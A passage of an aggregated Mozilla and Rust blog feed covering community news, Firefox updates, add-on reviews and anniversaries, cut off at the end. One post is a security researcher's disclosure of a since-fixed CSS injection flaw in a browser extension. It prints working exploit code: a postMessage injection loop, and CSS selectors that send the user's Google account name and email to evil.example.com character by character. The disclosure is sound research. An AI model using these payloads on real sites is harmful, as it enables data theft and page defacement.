Some of these tasks may also have mentors available, visit the task page for more information.

Synth

Sycamore

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

297 pull requests were merged in the last week

Rust Compiler Performance Triage

A fairly mixed week, with improvements and regressions mostly balancing each other out. The highlight is that we have now started to adopt a new performance triage process, which will label PRs that introduce performance regressions with the perf-regression label. Authors and/or reviewers are expected to justify their performance regression, either with a short summary of why the change is worth it despite the regression, or by creating an issue to follow up on the regression.

We hope this process will lead to better compiler performance in the long term.

Triage done by @rylev. Revision range: 5a78340..9a27044

2 Regressions, 3 Improvements, 2 Mixed; 1 of them in rollups.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

StructionSite

ChainSafe Systems

InfinyOn

Merantix

NORICS GmbH

NZXT

Parity Technologies

Estuary

Kraken

Subspace Network

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

One thing I like about Rust is that it filters out lazy/sloppy thinkers. Even when I disagree with another Rust programmer, there is a certain level of respect that comes from knowing that they thought about the problem deeply enough to pass the borrow checker.

Zeroexcuses on rust-users

Thanks to Jonah for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Chris H-CResponsible Data Collection is Good, Actually (Ubisoft Data Summit 2021)

In June I was invited to talk at Ubisoft’s Data Summit about how Mozilla does data. I’ve given a short talk on this subject before, but this was an opportunity to update the material, cover more ground, and include more stories. The talk, including questions, comes in at just under an hour and is probably best summarized by the synopsis:

Learn how responsible data collection as practiced at Mozilla makes cataloguing easy, stops instrumentation mistakes before they ship, and allows you to build self-serve analysis tooling that gets everyone invested in data quality. Oh, and it’s cheaper, too.

If you want to skip to the best bits, I included shameless advertising for Mozilla VPN at 3:20 and becoming a Mozilla contributor at 14:04, and I lose my place in my notes at about 29:30.

Many thanks to Mathieu Nayrolles, Sebastien Hinse and the Data Summit committee at Ubisoft for guiding me through the process and organizing a wonderful event.

:chutten

Mozilla Localization (L10N)Better Understanding Pontoon Notifications to Improve Them

As l10n-drivers, we strongly believe that notifications are an important tool to help localizers organize, improve, and prioritize their work in Pontoon. In order to make them more effective, and focus our development work, we first needed to better understand how localizers use them (or don’t).

In the second quarter of 2021, we ran a couple of experiments and a survey to get a clearer picture of the current status, and this blog post describes in detail the results of this work.

Experiments

First of all, we needed a baseline to understand if the experiments were making significant changes. Unfortunately, this data is quite hard to measure, since there are a lot of factors at play:

  • Localizers are more active close to deadlines or large releases, and those happen randomly.
  • The number of notifications sent heavily depends on new content showing up in the active projects (31), and that has unpredictable spikes over time.

With that in mind, we decided to repeat the same process every month:

  • Look at the notifications sent in the first 2 weeks of the month (“observation period”, starting with a Monday, and ending with a Monday two weeks later).
  • After 2 additional weeks, measure data about notifications (sent, read), recipients, how many of the recipients read at least 1 notification, and how many users were logged in (over the whole 4 weeks).
                     BASELINE       EXPERIMENT 1   EXPERIMENT 2
Observation period   April 5-19     May 3-17       May 31 – June 14
Data collected on    May 3          May 31         June 28
Sent                 27043          12593          15383
Read                 3172           1571           2198
Recipients           3072           2858           3370
Read 1+              140 (4.56%)    125 (4.37%)    202 (5.99%)
Users logged in      517            459            446

Experiment 1

For the 1st experiment, we decided to promote the Pontoon Add-on. This add-on, among other things, allows users to read Pontoon notifications directly in the browser (even if Pontoon is not currently open), and receive a system notification when there are new messages to read.

Pontoon Add-on Promotion

Pontoon would detect if the add-on is already installed. If not, it would display an infobar suggesting to install the add-on. Users could also choose to dismiss the notification: while we didn’t track how many saw the banner, we know that 393 dismissed it over the entire quarter.

Unfortunately, this experiment didn’t seem to have an immediate positive impact on the number of users reading notifications (it actually decreased slightly). On the other hand, the number of active users of the add-on has been slowly but steadily increasing, so we hope that will have an impact in the long term.

Pontoon Add-on Statistics over last 90 days

Thanks to Michal Stanke for creating the add-on in the first place, and helping us implement the necessary changes to make the infobar work in Pontoon. In the process, we also made this an “official” add-on on AMO, undergoing a review for each release.

Experiment 2

For the 2nd experiment, we made a slight change to the notifications icon within Pontoon, given that we always suspected the existing one was not very intuitive. The original bell icon would change color from gray to red when new notifications were available; the new one displays the number of unread notifications as a badge over the icon, a popular UX pattern.
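
As an aside, the badge itself takes only a few lines of DOM code. Here is a minimal sketch of the pattern, assuming a hypothetical #notifications icon with a .badge child element (this is not Pontoon’s actual markup):

// Minimal sketch of the unread-count badge pattern.
// "#notifications .badge" is a hypothetical element, not Pontoon's markup.
function updateNotificationBadge(unreadCount) {
  const badge = document.querySelector("#notifications .badge");
  badge.hidden = unreadCount === 0; // no badge when everything is read
  badge.textContent = String(unreadCount); // e.g. "3" over the bell icon
}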

Pontoon Notification

This seemed to have a positive impact on the number of users reading notifications, as the ratio of recipients reading notifications has increased by over 30%. Note that it’s hard to isolate the results of this experiment from the other work raising awareness around notifications (first experiment, blog posts, outreach, or even the survey).

Survey

Between May 26 and June 20, we ran a survey targeting users who were active in Pontoon within the last 2 years. In this context, “active” means that they submitted at least one translation over that period.

We received 169 complete responses, and these are the most significant points (you can find the complete results here).

On a positive note, the spread of the participants’ experience was surprisingly even: 34.3% have been on Pontoon for less than a year, 33.1% between 1 and 4 years, 32.5% for more than 4 years.

7% of participants claim that they don’t know what their role is in Pontoon. That’s significant, even more so if we account for participants who might have picked “translator” while they’re actually contributors (I translate, therefore I’m a translator). Clearly, we need to do some work to onboard new users and help them understand how roles work in Pontoon and what the lifecycle of a suggestion is.

53% of people don’t check Pontoon notifications. More importantly, almost 63% of these users — about 33% of all participants — didn’t know Pontoon had them in the first place! 19% feel like they don’t need notifications, which is not totally surprising: volunteers contribute when they can, not necessarily when there’s work to do. Here lies a significant problem though: notifications are used for more than just telling localizers “this project has new content to localize”. For example, we use notifications to comment on specific errors in translations, or to provide more background on a specific string or project.

As for areas where to focus development, while most features were considered between 3 and 5 on a 1-5 importance scale, the highest rated items were:

  • Notifications for new strings should link to the group of strings added.
  • For translators and locale managers, get notifications when there are pending suggestions to review.
  • Add the ability to opt-out of specific notifications.

What’s next?

First of all, thanks to all the localizers who took the time to answer the survey, as this data really helps us. We’ll need to run it again in the future, after we make more changes, in particular to understand how the data evolves around notification discoverability and awareness.

As an immediate change, given the results of experiment 2, we plan to keep the updated notification icon as the new default.

François MarierZoom WebRTC links

Most people connect to Zoom via a proprietary client which has been on the receiving end of a number of security and privacy issues over the past year, with some experts even describing it as malware.

It’s not widely known, however, that Zoom offers a half-decent WebRTC client, which means cross-platform, one-click access to a Zoom room or webinar without needing to install any software.

Given a Zoom link such as https://companyname.zoom.us/j/123456789?pwd=letmein, you can use https://zoom.us/wc/join/123456789?pwd=letmein to connect in your browser.

Notice that the pool of Zoom room IDs is global and you can just drop the companyname from the URL.
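
The rewrite is mechanical enough to script. Here is a minimal sketch, assuming the /j/<meeting id> link format shown above (zoomToWebRtcUrl is just an illustrative name):

// Rewrite a standard Zoom invite link into its WebRTC client equivalent.
function zoomToWebRtcUrl(inviteUrl) {
  const url = new URL(inviteUrl);
  const match = url.pathname.match(/\/j\/(\d+)/);
  if (!match) throw new Error("Not a recognized Zoom join link");
  // Room IDs are global, so the company subdomain can be dropped.
  return `https://zoom.us/wc/join/${match[1]}${url.search}`;
}

zoomToWebRtcUrl("https://companyname.zoom.us/j/123456789?pwd=letmein");
// -> "https://zoom.us/wc/join/123456789?pwd=letmein"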

In my experience, however, Jitsi has much better performance than Zoom’s WebRTC client. For instance, I’ve never been able to use Zoom successfully on a Raspberry Pi 4 (8GB), but Jitsi works quite well. If you have a say in the choice of conference platform, go with Jitsi instead.

Wladimir PalantHaving fun with CSS injection in a browser extension

Normally, CSS injection vulnerabilities are fairly boring. With some luck, you can use them to assist a clickjacking attack. That is, unless the vulnerable party is a browser extension, and it lets you inject CSS code into high profile properties such as Google’s. I’ve now had some fun playing with this scenario, courtesy of G App Launcher browser extension.

Website malicious.com injects CSS code via the G App Launcher browser extension into the google.com website. As a result, the malicious website displays the message: Your name is John Smith, john@example.com

Image credits: Mozilla, G App Launcher

The vulnerability has been resolved in G App Launcher 23.6.1 on the same day as I reported it. Version 23.6.5 then added more changes to further reduce the attack surface. This was a top notch communication experience, many thanks to Carlos Jeurissen!

The issue

As so often, the issue here was a message event listener (something that browser vendors could address). In G App Launcher 23.6.0 it looked as follows (variable names reconstructed for clarity):

window.addEventListener("message", function (event) {
  if (event.data) {
    if ("hide" === event.data.newGbwaConfig) {
      overlay.classList.add("💙-hgbwa");
      if (button && isButtonVisible())
        button.click();
    }
    if ("launcheronly" === event.data.newGbwaConfig)
      overlay.classList.remove("💙-cgbwa");
    if (event.data.algClose)
      closeOverlay();
    if (event.data.algHeight)
      setHeight(event.data.algHeight);
  }
}, true);

This event handler would accept commands from any website. Most of these commands merely control visibility of the overlay without taking any data from the message into account. The only interesting command is algHeight. Looking at the setHeight() function, the relevant part is this:

var element = document.createElement("style");
element.textContent = ".💙-c {height:" + (height + 14) + "px !important;}";

If height here is a string, the arithmetical addition turns into string concatenation. So a value like 0}body{display:none}.dummy{ will inject arbitrary styles (here rendering the entire document invisible).
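
To make the type confusion concrete, here is a quick sketch of what that payload produces (plain JavaScript semantics, runnable anywhere):

// A string operand turns + into concatenation:
const height = "0}body{display:none}.dummy{";
const css = ".💙-c {height:" + (height + 14) + "px !important;}";
console.log(css);
// -> ".💙-c {height:0}body{display:none}.dummy{14px !important;}"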

Last question before we turn to exploitation: where is this event handler active? The content script is injected for Google domains only. And there is an additional check in the code which excludes some sites:

if (!(origin.startsWith("https://ogs.google.") ||
    origin.startsWith("https://accounts.google.") ||
    origin.startsWith("https://cello.client-channel.google."))) {

The Google Accounts sign-in site is excluded, too bad. But all other Google properties can be exploited. One more check disables this functionality on Safari, making it the only browser not affected.

Messing with the content

Most Google websites protect against clickjacking attacks by disallowing framing. This means that the attackers would have to open a Google website in a new tab. This also has the advantage of displaying a trusted address in the address bar.

Still, what’s the worst that could happen? The attackers will hide some parts of the content and rearrange others? This doesn’t sound like a big issue. But CSS can also modify the content displayed. Consider the following code for example:

document.body.onclick = () =>
{
  let wnd = window.open("https://www.google.com/search?q=google", "_blank");
  setInterval(() =>
  {
    wnd.postMessage({algHeight: `0;}
      h3::before
      {
        content: "Hacked!";
        font-size: 20px !important;
      }
      h3
      {
        font-size: 0 !important;
      }
      dummy{`}, "*");
  }, 0);
}

When the user clicks somewhere, this will open Google Search. The attacking page will immediately start posting a message to the G App Launcher extension, making it add some CSS code to the search page. The search results will then look like this:

Google search result page for the search 'google' with the titles of all search results replaced by 'Hacked!'

This might be enough to convince somebody that Google has indeed been hacked. Similarly, attackers might for example display a Bitcoin scam, with an official Google domain lending it credibility.

Exfiltrating data

But that’s not the end of it. Google websites know a lot about you. For example, there is the following element:

<a class="…" aria-label="Google Account: Wladimir Palant (me@example.com)">

Using CSS only, it is possible to read out the value of this aria-label attribute. As far as I am aware, this attack was first publicized by Eduardo Vela in 2008; he built his CSS Attribute Reader as a proof of concept. Here the attacking website would inject the following CSS code into a Google page:

a[aria-label^="Google Account: a"]
{
  background-image: url("https://evil.example.com/?a");
}
a[aria-label^="Google Account: A"]
{
  background-image: url("https://evil.example.com/?A");
}

/* … */

a[aria-label^="Google Account: W"]
{
  background-image: url("https://evil.example.com/?W");
}

/* … */

a[aria-label^="Google Account: z"]
{
  background-image: url("https://evil.example.com/?z");
}
a[aria-label^="Google Account: Z"]
{
  background-image: url("https://evil.example.com/?Z");
}

The CSS code lists selectors for every possible first letter of the account name. For me, the selector a[aria-label^="Google Account: W"] will match the element and trigger a request to https://evil.example.com/?W. So the attacking website will learn that the first letter is W and send a new message to the page, injecting a new set of selectors:

a[aria-label^="Google Account: Wa"]
{
  background-image: url("https://evil.example.com/?Wa");
}
a[aria-label^="Google Account: WA"]
{
  background-image: url("https://evil.example.com/?WA");
}

/* … */

a[aria-label^="Google Account: Wl"]
{
  background-image: url("https://evil.example.com/?Wl");
}

/* … */

a[aria-label^="Google Account: Wz"]
{
  background-image: url("https://evil.example.com/?Wz");
}
a[aria-label^="Google Account: WZ"]
{
  background-image: url("https://evil.example.com/?WZ");
}

Now the selector a[aria-label^="Google Account: Wl"] will match the element and the website can start guessing the third letter. The process is repeated until the entire attribute value is known. That’s both my name and email address. And the attack is happening completely in the background while I am interacting with the page normally. There are no page reloads or anything else that would tip off users about the attack.
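
The selector sets are mechanical enough that the attacking page can generate each round programmatically. Here is a minimal sketch (buildProbeCss is a hypothetical helper, not code from the actual exploit; wnd is the window opened in the earlier snippet):

// Build the probe CSS for the next round, given the prefix recovered so far.
function buildProbeCss(prefix) {
  const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  return Array.from(letters, (ch) =>
    `a[aria-label^="Google Account: ${prefix}${ch}"] ` +
    `{ background-image: url("https://evil.example.com/?${encodeURIComponent(prefix + ch)}"); }`
  ).join("\n");
}

// Wrap the generated rules in the algHeight payload, as before:
wnd.postMessage({ algHeight: `0;}\n${buildProbeCss("W")}\ndummy{` }, "*");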

And that’s just an arbitrary Google website. A similar attack could be launched against Gmail for example to extract the names and email addresses of people you are communicating with. Given enough time, this attack could extract all your contacts.

How much time? With some optimizations: probably not too much. The main slowdown here is the request going out to a web server. That web server then has to communicate back to the attacking page so that it launches the next attack round. But modern browsers support service workers, a mechanism that allows such requests to be handled in client-side JavaScript code. So a service worker could receive the background image request and notify the attacking page, all without producing any network traffic whatsoever.

Timeline

  • 2021-06-01: Notified G App Launcher author about the vulnerability via support email address.
  • 2021-06-01: Received response that G App Launcher 23.6.1 has been released and is pending review by add-on stores.
  • 2021-06-03: Received notification that the update is live on all add-on stores but Microsoft Edge.
  • 2021-06-10: Received notification that G App Launcher 23.6.5 with further attack surface reduction is live on all add-on stores.
  • 2021-06-14: Agreed on 2021-06-28 as final disclosure date.

Mozilla Performance BlogPerformance Sheriff Newsletter (May 2021)

In May there were 198 alerts generated, resulting in 27 regression bugs being filed on average 4.5 days after the regressing change landed.

Welcome to the May 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by an update on our migration to browsertime as our primary tool for browser automation. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.5 days
  • 91% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 1.7 days
  • 100% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (May 2021)

In April we enabled automatic backfills for alerts for Linux and Windows. This means that whenever we generate an alert summary for these platforms, we now automatically trigger the affected tests against additional pushes. This is typically the first thing a sheriff will do when triaging an alert, and whilst it isn’t a time-consuming task, the triggered jobs can take a while to run. By automating this, we increase the chance of our sheriffs having the additional context needed to identify the push that caused the alert at the time of triage.

If successful, automatic backfills should reduce the time between the alert being generated and the regression bug being opened. Whilst the results for May look promising, we have seen some fluctuation in this metric so I’ll hold off any celebrations for now.

Revisiting Browsertime

Back in November’s newsletter I shared our plans to finish migrating all of our page load tests away from our own web extension solution to the popular browsertime open source project. I’m happy to report that this was completed early in February, and has since been followed by migration of most of our benchmark tests to browsertime.

Raptor vs Browsertime by Month (May 2021)

Looking back, we saw our first alert from tests using browsertime in May 2020, so it’s somewhat neat to see that one year on we have now migrated all of our sheriffed tests, and May 2021 was the first month where we recorded no alerts from the web extension. We still have a few remaining tests to migrate before we can remove all the legacy code from our test harness, but I anticipate this happening sometime this year.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for May can be found here (for those with access).

Mozilla Addons BlogReview Articles on AMO and New Blog Name

I’m very happy to announce a new feature that we’ve released on AMO (addons.mozilla.org). It’s a series of posts that review some of the best add-ons we have available on AMO. So far we have published three articles:

Our goal with this new channel is to provide user-friendly guides into the add-ons world, focused on topics that are at the top of Firefox users’ minds. And, because we’re publishing directly on AMO, you can install the add-ons directly from the article pages.

Screenshot of article

A taste of the new look and feel

All add-ons that are featured in these articles have been reviewed and should be safe to use. If you have any feedback on these articles or the add-ons we’ve included in them, please let us know in the Discourse forum. I’ll be creating new threads for each article we publish.

New blog name

These posts are being published in a new section on AMO called “Firefox Add-on Reviews”. So, while we’re not calling it a “blog”, it could still cause some confusion with this blog.

In order to reduce confusion, we’ve decided to rename this blog from “Add-ons Blog” to “Add-ons Community Blog”, which we think better represents its charter and content. Nothing else will change: the URL will remain the same and this will continue to be the destination for add-on developer and add-on community news.

I hope you like the new content we’re making available for you. Please share it around and let us know what you think!

The post Review Articles on AMO and New Blog Name appeared first on Mozilla Add-ons Community Blog.

William LachanceMini-sabbatical and introducing Irydium

Approaching my 10-year moz-iversary in July, I’ve decided it’s time to take a bit of a mini-sabbatical: I’ll be out (and trying as hard as possible not to check bugmail) from Friday, June 25th until August 9th. During this time, I’ll be doing a batch at the Recurse Centre (something like a writer’s retreat for programmers), exploring some of my interests around data visualization and analysis that don’t quite fit into my role as a Data Engineer here at Mozilla.

In particular, I’m planning to work a bunch on a project tentatively called “Irydium”, which pursues some of the ideas I sketched out last year in my Iodide retrospective and a few more besides. I’ve been steadily working on it in my off hours, but it’s become clear that some of the things I want to pursue would benefit from more dedicated attention and the broader perspective that I’m hoping the Recurse community will be able to provide.

I had meant to write up a proper blog post to announce the project before I left, but it looks like I’m pretty much out of time. Instead, I’ll just offer up the examples on the newly-minted irydium.dev and invite people to contact me if any of the ideas on the site sounds interesting. I’m hoping to blog a whole bunch while I’m there, but probably not under the Mozilla tag. Feel free to add wrla.ch to your RSS feed if you want to follow what I’m up to!

Firefox NightlyThese Weeks in Firefox: Issue 96

Highlights

  • Improved dark mode support for macOS is now enabled in Nightly and Early Beta! When Firefox is in dark mode, look out for:
    • Dark Library/Page Info windows
      • The Library window on macOS, styled with the Dark Theme

        This is what the Library looks like with the lights off.

    • Dark tooltips
      • The Firefox tab strip with the mouse hovered over one tab. A dark tooltip says "Firefox Privacy Notice - Mozilla (pid 6752)"

        Dark tooltips, too!

    • Dark text selection colors in UI chrome
    • Dark autocomplete popups (login autofill, etc)
      • The autocomplete dropdown is shown below a form input. The dropdown is dark themed, and suggests the string "Mozilla" for a "Company" form field.

        These autocomplete dropdowns are getting dark, too!

    • Dark window styling, including dark stoplight buttons and the elimination of the dreaded white line at the top of dark windows
    • If you notice things that don’t look right, please file bugs blocking Bug 1623686.
  • Dimi landed password manager support for multi-page login forms! The password manager will now:
    • Detect username only forms
    • Support autofill, autocomplete, and context menu in these username only forms
    • Support login capture when users submit the multi-page form with the password

Friends of the Firefox team

For contributions from June 1 to June 15, 2021, inclusive.

Introductions/Shout-Outs

Resolved bugs (excluding employees)

For contributions from June 1 to June 15, 2021, inclusive.

Fixed more than one bug

  • Andrey Bienkowski
  • Ava Katushka
  • jha.ashray12
  • Kajal Sah
  • Michelle Goossens

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

  • Sonia Singla contributed a patch to remove the about:config preference “extensions.allowPrivateBrowsingByDefault” (it was introduced as a fallback to the older behavior during the transition to the user-controlled extension permission that selectively allows extensions to run in private windows) – Bug 1661517
  • As part of the work to support “Manifest Version 3 extensions”, an initial chunk of the work to expose the WebExtensions APIs to the extensions’ “background service worker” has landed in Nightly 91 (locked behind a pref that can only be enabled in Nightly builds) – Bug 1682632
    • Bug 1682632 does not yet expose any actual extension APIs to background service workers; an initial set of APIs (browser.alarms, browser.runtime and browser.tests) is part of the follow-up Bug 1688040
    • For a high-level view of the plans related to “Manifest Version 3 extensions” support, see the blog post we recently published on the “Mozilla Add-ons Blog”: https://blog.mozilla.org/addons/2021/05/27/manifest-v3-update/

Downloads Panel

  • Outreachy intern, Ava, has landed the following:
    • A change where downloads opened with a computer application through the “What should Firefox do with this file?” prompt are directly saved to the Downloads folder (bug 1710933). This was already the behavior on macOS, and now Windows and Linux do this too if the browser.download.improvements_to_download_panel preference is set to true.
    • Test for basic functionality of downloads telemetry (bug 1712997)
  • In-progress:
    • Ava is working on making “Save to disk” the default decision for downloading files (bug 171094); she’s already written a patch. This change is also behind the browser.download.improvements_to_download_panel preference.
    • Ava has started investigating how frequently we should be opening the downloads panel (perhaps with an option to opt-out?) (bug 1709129)

macOS Spotlight

  • Work continues on native fullscreen support.
  • Work continues on reducing power consumption during video playback.
  • We’re looking into reports that Firefox is triggering memory pressure warnings, especially on M1 Macs.

New Tab Page

  • Upcoming (Firefox 90) Private Browsing New Tab Page experiment to promote Mozilla VPN with 3 different design variations bug 1715504

Nimbus / Experiments

  • Working on a wrapper API to allow cpp/platform clients to use the Nimbus API bug 1716560

NodeJS

  • In-tree Node 10 -> Node 12 upgrade expected to land today (Tuesday, June 15th)
    • This mailing list post has more details
    • Most developers shouldn’t need to do anything.
    • A followup post will be sent after the landing with details for the few folks who may wish to verify that everything is still working for them.

Password Manager

  • Tgiles landed an improved password generation experience by utilizing Apple’s password rules data! Bug 1686071
    • Now when users generate passwords on sites that have an entry in the “password-rules” dataset, we will generate a stronger and more accurate password based on site requirements!
    • Note: we currently do not have Apple’s password rules data pulled into Firefox so the improved password generation experience is not noticeable yet. The data should be pulled in within the next week or two.

Performance

  • Hang stats! Did you just add new code that runs on the main thread? Our BHR (Background Hang Reporter) system can help you detect if it’s causing hangs for our users in the wild. You can view the latest hang data here!
  • mconley landed patches to make it possible to control the about:home startup cache via Nimbus
    • The goal is to do a Nimbus experiment to see how the cache impacts user behaviour on Beta and (maybe) Release

Performance Tools

  • Screenshots are now visible while selecting a time range.
    • The Firefox Profiler UI shown in an animated GIF. The animation shows the cursor selecting a time range, and a smaller version of the collected screenshot for the slice of time being hovered is shown.

      One of our most powerful performance tools just got a bit better!

  • The profiler Rust API for thread registration has now landed. If you are working on a Rust project with multiple threads, don’t forget to register your threads with the Gecko Profiler. It’s pretty straightforward with the gecko_profiler::register_thread and gecko_profiler::unregister_thread endpoints. More Rust API endpoints for the profiler are coming soon!

Privacy/Security

Proton/MR1

Search and Navigation

  • Harry fixed a problem with a synced preference causing some address bar results to not appear anymore – Bug 1715484
  • Harry is doing some re-architecture work to split the old unified address bar provider into separate providers, that will give us better separation of concerns and control over results composition – Bug 1677126, Bug 1662167, Bug 1712352
  • Harry reduced the padding around search shortcut buttons in the address bar – Bug 1712775
  • Daisuke corrected cut text glyphs on address bar results – Bug 1565448
  • Daisuke fixed a problem with the focus ring briefly appearing on the address bar when clicking its border – Bug 1708263
  • Daisuke converted the separate search bar shortcut buttons to compact mode, like in the address bar – Bug 1709405
  • Drew is working on improvements to address bar results flexibility – Bug 1713322

Screenshots

Firefox Add-on ReviewsWatch videos with friends anywhere—how to social stream with browser extensions

If you’re missing the fun of watching movies and other entertainment with friends in real time, try a browser extension like Metastream Remote or Watch2gether to host private online watch parties. 

Metastream Remote

Install Metastream Remote and host a watch party within minutes. It works with most common video streaming sites like YouTube, Twitch, Vimeo, Dailymotion—even audio sites like SoundCloud. Subscription services such as Netflix, Hulu, and Disney+ work, too, though everyone in your watch party will need their own accounts on those platforms. 

Making things even easier is that only the host needs to install the Metastream extension. Once the host creates a watch party, the extension produces a shareable link, so guests simply click the link and presto—everyone’s screen is synced to the host and the group communicates via chat.

Watch parties are private by default, but you can create public events. There’s no cap on the number of guests you can invite, but sync performance may degrade if the party gets into the many dozens of people. 

Metastream can also queue media, so if you’re watching short clips or music videos it’s easy to line up your content so the party seamlessly flows from one piece to the next.

Watch2gether

Watch2gether is a popular web-based social streaming platform that doesn’t require a browser extension, but using the Watch2gether extension in concert with the website offers a few additional features:

  • Ability to social stream content that’s not directly supported by the Watch2gether website (e.g. the video source doesn’t offer an embeddable version) 
  • Ability to social stream content that is supported by Watch2gether but the specific video you want to watch is, for whatever reason, restricted
  • Easy access to your watch rooms

Watch2gether supports a huge array of popular streaming sites—all the ones you’d expect like YouTube, Vimeo, Twitch, etc.—but also some that might surprise like TikTok and Instagram. There’s even a livestream mode if you want to make yourself the star of the show. 

The big paid platforms like Netflix, Amazon, and Disney+ may be accessed with Watch2gether, but as with Metastream Remote, all watch party members will need their own respective accounts on those services.

Transform your media experience

Take your watch party to the next level with additional browser extensions… 

Enhancer for YouTube

Gobs of features and enhancements to completely alter and improve the way you enjoy YouTube. 

While dozens of customization options may seem like an overwhelming number of choices, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration
Enhancer for YouTube offers easy access controls just beneath the video player.

Turn Off the Lights

This lightweight extension gives you simple, one-click access to Theater mode for any video site. Just hit Turn Off the Lights’ toolbar button and everything around the video player fades to dark so you can focus solely on your video content.

Key features… 

  • Set default video quality from low to high def
  • Widescreen mode
  • Subtle visual tweaks like custom colors and opacity setting
  • Mouse-wheel controls

Audio Equalizer

Sound quality is a huge part of your video experience, and obviously so if your watch party is more of a listening party with music videos or SoundCloud streams. The Audio Equalizer extension puts powerful audio enhancement features right into your browser. 

Adjust balance levels, EQ, and other key audio elements right from the extension’s handy pop-up controls. For music specifically, there’s a drop-down menu that lets you select the genre you’re listening to—rock, reggae, dance, etc.—so your stream is optimized per style. You can even save your own custom EQ settings should you want to dial in the audio to your own ear. 

Audio Equalizer gives you a range of sound controls right from its toolbar button.

We hope your next watch party is a smashing success! Find more media enhancing extensions on addons.mozilla.org.

Mozilla Reps CommunityCelebrating 10 years of Reps

Last week the Reps program celebrated its 10 years anniversary. To honor the event, a week of celebrations took place, with meetings in Zoom rooms and virtual hangouts in specially decorated Hubs rooms. During that week, current Reps and Reps alumni shared memories of the past years, talked about their current work, and discussed future plans and aspirations.

The Reps program was created with a simple narrative in the minds of its founders (William Quiviger and Pierros Papadeas): to bring structure to the regional communities and help them grow. Over the years, the Reps have served their communities, growing and mentoring them, supporting all of Mozilla’s big projects and launches, and pivoting to help wherever the organization needed them most. From the 1 million Mozillians initiative to the Firefox OS days, and from the Quantum launch to the recent foxfooding campaign, Reps have always stepped up to the challenge, lending a helping hand, organizing thousands of events, and amplifying Mozilla’s work and mission. And it is that spirit that we wanted to celebrate during the last week: a spirit of giving and helping.


The event

Due to the pandemic, an event with physical attendance was not possible. However, that didn’t discourage the Reps. A full-week virtual event was organized instead (special kudos to Francesca Minelli for all the work on planning and coordinating it) that included virtual talks in Zoom rooms and hangout time in two Hubs rooms: a dedicated Reps room and a room for communities. On the first day we kicked off with a trip down memory lane, where Reps alumni and longtime Reps were invited to talk about their experiences during the first days of the program. The day closed with a talk and Q&A with Mitchell Baker about the significance of the Reps program and how Reps can contribute to the future of Mozilla. The second day was dedicated to the current state of the program, where Reps had a chance to chat with the Reps council about its current work. The last two days were dedicated to the current work of Reps and how it affects the rest of the organization, with talks from both staff and volunteers presenting their communities. During the last days, we also focused on how Reps can improve, gathering feedback and suggestions for the future of the program.

Long time Reps and Reps alumni

Hanging out at the Hubs room

And what about the future?


For the future, we are focusing on two main pillars: 1) improving the mentorship program, so Reps can feel more supported and be able to do more, and 2) working on how we can bring volunteers into product work. The latter is already happening via the campaigns. We want to involve volunteers earlier in product experience and ideation and, of course, keep spreading the word. A busy future is ahead for the Reps, but we are ready for it. Reps onwards!

Karl DubostToday is my Mozilla 8 years anniversary

Eight years ago, I started working at Mozilla.

Archer on a stone wall decoration.

Hiring, a long process

In my employment history, I have never tried to cast a wide net to land a job, except probably for my first real job in 1995. I have always carefully chosen the companies I wanted to work for. I probably applied ten times over the course of 10 years before landing a job at Mozilla.

When the Web Compatibility team was created, I applied to one of the positions available in 2013. In April 2013, from Montreal, I flew to Mountain View for a series of job interviews with different Mozilla employees. Most of the interviews were interesting, but I remember one engineer was apparently not happy interviewing me and it didn’t go very well. I don’t remember who, but it left me with a bitter taste at the time. A couple of days later I was notified that I had not been selected for the job. While disappointing, it was not surprising. I usually do not perform well during interviews, specifically when you have to demonstrate knowledge instead of articulating the way you work with knowledge. I find interviews a kind of theater.

But Mozilla came back to me and proposed a 6-month contract, still in the Mozilla Web Compatibility team but for another role. It was not what I was initially interested in, but why not? That’s when I met Lawrence Mandel, who would be my future manager if I landed the job. I liked the contact right away. I got an offer in June 2013. I signed.

Fast forward 8 years, I'm currently the manager of the Web Compatibility team.

Without people, no Web Compatibility!

The Web Compatibility team started with 3 people: Mike Taylor, Hallvord R. M. Steen, and myself, and at its peak we were probably 10 people, depending on how we count. We are currently 7 people, including myself. Talking about my 8-year anniversary doesn’t make sense without mentioning the work of the team. My work is insignificant if we don’t consider the whole of what the team is achieving.

Figures on a stone wall decoration.

« And yet, if I instill in my men the love of sailing the sea, so that each of them is drawn by a weight in his heart, then you will soon see them diversify according to their thousand particular qualities. One will weave canvas, another in the forest will fell the tree with the flash of his axe. Yet another will forge nails, and somewhere there will be those who observe the stars in order to learn to steer. And yet all will be as one. To create the ship is not to weave the canvas, to forge the nails, to read the stars, but rather to give the taste of the sea, which is one; and in its light nothing remains contradictory, but all is community in love. »

Antoine de Saint-Exupéry. « Citadelle. »

Since the beginning of 2021,

